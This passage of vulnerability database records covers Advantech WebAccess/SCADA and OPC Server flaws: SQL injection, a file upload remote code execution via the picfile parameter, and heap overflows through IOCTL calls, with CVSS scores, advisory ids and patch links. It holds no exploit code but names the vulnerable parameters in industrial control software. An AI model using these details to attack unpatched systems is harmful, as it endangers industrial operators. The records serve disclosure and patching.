"db": "NVD", "id": "CVE-2020-10638", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-202005-295" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess/SCADA ViewSrv IOCTL 0x00002723 Heap-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-20-593" } ], "trust": 0.7 }, "type": { "_id": null, "data": "Buffer error", "sources": [ { "db": "IVD", "id": "95f15ed9-abd1-4fa7-b3b8-cce038c93754" }, { "db": "IVD", "id": "619b16c7-a995-4cdf-b7be-d91e2bdc75ec" }, { "db": "CNNVD", "id": "CNNVD-202005-295" } ], "trust": 1.0 } }
var-201202-0224
Vulnerability from variot
Multiple SQL injection vulnerabilities in Advantech/BroadWin WebAccess before 7.0 allow remote attackers to execute arbitrary SQL commands via crafted string input. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess is prone to multiple remote vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach? Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM: http://secunia.com/products/corporate/vim/ovum_2011_request/
TITLE: Advantech OPC Server ADAM ActiveX Control Buffer Overflow Vulnerability
SECUNIA ADVISORY ID: SA46775
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46775/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
RELEASE DATE: 2011-11-07
DISCUSS ADVISORY: http://secunia.com/advisories/46775/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/46775/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been reported in Advantech OPC Server, which can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to an error in the ADAM ActiveX control and can be exploited to cause a buffer overflow.
Successful exploitation may allow execution of arbitrary code.
The vulnerability is reported in the following components: * Advantech ADAM OPC Server versions prior to V3.01.012. * Advantech Modbus RTU OPC Server versions prior to V3.01.010. * Advantech Modbus TCP OPC Server versions prior to V3.01.010.
SOLUTION: Reportedly a patch has been released. Contact the vendor for further information.
PROVIDED AND/OR DISCOVERED BY: ICS-CERT credits Security Research and Service Institute Information and Communication Security Technology Center (ICST).
ORIGINAL ADVISORY: ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201202-0224", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "6.0" }, { "model": "broadwin webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "broadwin", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "6.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "5.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "1a26fde4-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0670" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001562" }, { "db": "CNNVD", "id": "CNNVD-201202-420" }, { "db": "NVD", "id": "CVE-2012-0244" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:broadwin:webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001562" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Sense Vulnerability Coordination Team, Greg MacManus of iSIGHT Partners, Kuang-Chun Hung of Security Research and Service Institute-Information and Communication Security Technology Center (ICST), Luigi Auriemma, and\nSnake (alias).", "sources": [ { "db": "BID", "id": "52051" } ], "trust": 0.3 }, "cve": "CVE-2012-0244", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2012-0244", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "1a26fde4-2354-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-53525", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2012-0244", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2012-0244", "trust": 0.8, "value": "High" }, { "author": "CNNVD", "id": "CNNVD-201202-420", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "1a26fde4-2354-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-53525", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "1a26fde4-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-53525" }, { "db": "JVNDB", "id": "JVNDB-2012-001562" }, { "db": "CNNVD", "id": "CNNVD-201202-420" }, { "db": "NVD", "id": "CVE-2012-0244" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple SQL injection vulnerabilities in Advantech/BroadWin WebAccess before 7.0 allow remote attackers to execute arbitrary SQL commands via crafted string input. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess is prone to multiple remote vulnerabilities. \nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------\n\nOvum says ad hoc tools are out-dated. The best practice approach?\nFast vulnerability intelligence, threat handling, and setup in one tool. \n\nRead the new report on the Secunia VIM:\nhttp://secunia.com/products/corporate/vim/ovum_2011_request/ \n\n----------------------------------------------------------------------\n\nTITLE:\nAdvantech OPC Server ADAM ActiveX Control Buffer Overflow\nVulnerability\n\nSECUNIA ADVISORY ID:\nSA46775\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/46775/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nRELEASE DATE:\n2011-11-07\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/46775/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/46775/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in Advantech OPC Server, which can\nbe exploited by malicious people to compromise a user\u0027s system. \n\nThe vulnerability is caused due to an error in the ADAM ActiveX\ncontrol and can be exploited to cause a buffer overflow. \n\nSuccessful exploitation may allow execution of arbitrary code. \n\nThe vulnerability is reported in the following components:\n* Advantech ADAM OPC Server versions prior to V3.01.012. \n* Advantech Modbus RTU OPC Server versions prior to V3.01.010. \n* Advantech Modbus TCP OPC Server versions prior to V3.01.010. \n\nSOLUTION:\nReportedly a patch has been released. Contact the vendor for further\ninformation. \n\nPROVIDED AND/OR DISCOVERED BY:\nICS-CERT credits Security Research and Service Institute Information\nand Communication Security Technology Center (ICST). \n\nORIGINAL ADVISORY:\nICS-CERT:\nhttp://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n", "sources": [ { "db": "NVD", "id": "CVE-2012-0244" }, { "db": "JVNDB", "id": "JVNDB-2012-001562" }, { "db": "CNVD", "id": "CNVD-2012-0670" }, { "db": "BID", "id": "52051" }, { "db": "IVD", "id": "1a26fde4-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-53525" }, { "db": "PACKETSTORM", "id": "106765" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2012-0244", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-12-047-01", "trust": 2.3 }, { "db": "BID", "id": "52051", "trust": 1.4 }, { "db": "CNNVD", "id": "CNNVD-201202-420", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2012-0670", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-12-047-01A", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2012-001562", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-11-279-01", "trust": 0.4 }, { "db": "IVD", "id": "1A26FDE4-2354-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "SECUNIA", "id": "46775", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-53525", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "106765", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "1a26fde4-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0670" }, { "db": "VULHUB", "id": "VHN-53525" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001562" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-420" }, { "db": "NVD", "id": "CVE-2012-0244" } ] }, "id": "VAR-201202-0224", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "1a26fde4-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0670" }, { "db": "VULHUB", "id": "VHN-53525" } ], "trust": 1.551177005 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "1a26fde4-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0670" } ] }, "last_update_date": "2024-11-23T21:46:30.967000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/Webaccess-HMI-SCADA-Software/sub_GF-1M94V.aspx" }, { "title": "WebAccess", "trust": 0.8, "url": "http://www.broadwin.com/features.htm" }, { "title": "Offices Distributors", "trust": 0.8, "url": "http://www.broadwin.com/Offices.htm" }, { "title": "\u30d1\u30fc\u30c8\u30ca\u30fc\u60c5\u5831", "trust": 0.8, "url": "http://www.advantech.co.jp/support-AJP/distributors.asp" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.advantech.co.jp/" }, { "title": "Patch for Advantech WebAccess SQL Injection Vulnerability (CNVD-2012-0670)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/10291" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0670" }, { "db": "JVNDB", "id": "JVNDB-2012-001562" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-89", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-53525" }, { "db": "JVNDB", "id": "JVNDB-2012-001562" }, { "db": "NVD", "id": "CVE-2012-0244" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01.pdf" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/52051" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-0244" }, { "trust": 0.8, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01a.pdf" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-0244" }, { "trust": 0.4, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-11-279-01.pdf" }, { "trust": 0.3, "url": "http://webaccess.advantech.com/product.php" }, { "trust": 0.1, "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_intelligence/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/secunia_security_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/about_secunia_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/personal/" }, { "trust": 0.1, "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org" }, { "trust": 0.1, "url": "http://secunia.com/products/corporate/vim/ovum_2011_request/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/#comments" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0670" }, { "db": "VULHUB", "id": "VHN-53525" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001562" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-420" }, { "db": "NVD", "id": "CVE-2012-0244" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "1a26fde4-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0670" }, { "db": "VULHUB", "id": "VHN-53525" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001562" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-420" }, { "db": "NVD", "id": "CVE-2012-0244" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "IVD", "id": "1a26fde4-2354-11e6-abef-000c29c66e3d" }, { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0670" }, { "date": "2012-02-21T00:00:00", "db": "VULHUB", "id": "VHN-53525" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001562" }, { "date": "2011-11-09T12:04:37", "db": "PACKETSTORM", "id": "106765" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-420" }, { "date": "2012-02-21T13:31:57.267000", "db": "NVD", "id": "CVE-2012-0244" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0670" }, { "date": "2018-01-05T00:00:00", "db": "VULHUB", "id": "VHN-53525" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001562" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-420" }, { "date": "2024-11-21T01:34:39.120000", "db": "NVD", "id": "CVE-2012-0244" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201202-420" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech/BroadWin WebAccess In SQL Injection vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001562" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "SQL injection", "sources": [ { "db": "IVD", "id": "1a26fde4-2354-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201202-420" } ], "trust": 0.8 } }
var-201801-1868
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the picfile parameter in gmicons.asp. The issue results from the lack of proper validation of user-supplied data, which can allow for the upload of any file. An attacker can leverage this vulnerability to execute code in the context of the the web service.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-055" } ] }, "credits": { "_id": null, "data": "Zhou Yu", "sources": [ { "db": "ZDI", "id": "ZDI-18-055" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-18-055", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-18-055", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-055" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the picfile parameter in gmicons.asp. The issue results from the lack of proper validation of user-supplied data, which can allow for the upload of any file. An attacker can leverage this vulnerability to execute code in the context of the the web service.", "sources": [ { "db": "ZDI", "id": "ZDI-18-055" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-5057", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-055", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-055" } ] }, "id": "VAR-201801-1868", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:36:20.977000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-004-02" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-055" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-004-02" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-055" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-18-055", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-055", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-055", "ident": null } ] }, "title": { "_id": null, "data": "Advantech WebAccess picfile File Upload Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-18-055" } ], "trust": 0.7 } }
var-201602-0488
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x5208 IOCTL in the Kernel subsystem. A heap-based buffer overflow vulnerability exists in a call to strcpy. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-131" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-16-131" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "ZDI-16-131", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-16-131", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-131" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x5208 IOCTL in the Kernel subsystem. A heap-based buffer overflow vulnerability exists in a call to strcpy. An attacker can use this vulnerability to execute arbitrary code in the context of 